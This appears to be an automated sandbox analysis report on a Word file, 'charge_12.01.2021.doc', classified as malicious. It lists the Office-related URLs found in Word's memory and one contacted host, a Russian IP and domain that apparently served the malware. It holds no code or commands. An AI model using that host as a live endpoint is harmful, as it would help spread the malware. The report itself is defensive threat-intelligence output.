                                                                  		unknown
                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                    		high
                                                                    http://weather.service.msn.com/data.aspxWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                      		high
                                                                      https://login.windows.net/common/oauth2/authorizeaEWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://substrate.office.comPWINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                          		high
                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlWINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                            		high
                                                                            https://login.windows.net/common/oauth2/authorizeaWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://login.windows.net/common/oauth2/authorizecWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://wus2.contentsync.WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://login.windows.net/common/oauth2/authorizeeWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://clients.config.office.net/user/v1.0/ios7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                    		high
                                                                                    https://login.windows.net/common/oauth2/authorizegWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://api.cortana.aiD#WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://login.windows.net/common/oauth2/authorizeYWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://login.windows.net/common/oauth2/authorizeZWINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://o365auditrealtimeingestion.manage.office.comWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                            		high
                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                              		high
                                                                                              https://api.addins.omex.office.net/appstate/queryrWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.odwebp.svc.msomWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://clients.config.office.net/user/v1.0/android/policies7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office.com7WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://login.windows.net/common/oauth2/authorizeTWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonTWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/6WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://login.windows.net/common/oauth2/authorizeUWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://entitlement.diagnostics.office.com7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                          		high
                                                                                                          https://login.windows.net/common/oauth2/authorizeHWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                              		high
                                                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-askszWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeJWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office.com/WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                    		high
                                                                                                                    https://login.windows.net/common/oauth2/authorizeKWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://storage.live.com/clientlogs/uploadlocation7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeOWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistory7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeEWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeFWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://login.windows.net/common/oauth2/authorizepEWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorize8WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://outlook.office.com1769WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://login.windows.net/common/oauth2/authorize9WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize;WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorize=WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorize?WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://substrate.office.com/search/api/v1/SearchHistory~jWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://dataservice.o365filtering.com:7PWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		low
                                                                                                                                              https://login.windows.net/common/oauth2/authorize3WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://graph.windows.net/WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://login.windows.net/common/oauth2/authorize4WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://devnull.onenote.comWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                                                      		high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      194.62.42.207
                                                                                                                                                      		winrentals2017b.comRussian Federation
                                                                                                                                                      		34464ZEISS-ASRUfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                      Analysis ID:532355
                                                                                                                                                      Start date:02.12.2021
                                                                                                                                                      Start time:04:25:58
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 6m 2s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:charge_12.01.2021.doc
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:25
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • GSI enabled (VBA)
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.expl.evad.winDOC@8/16@1/1
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .doc
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
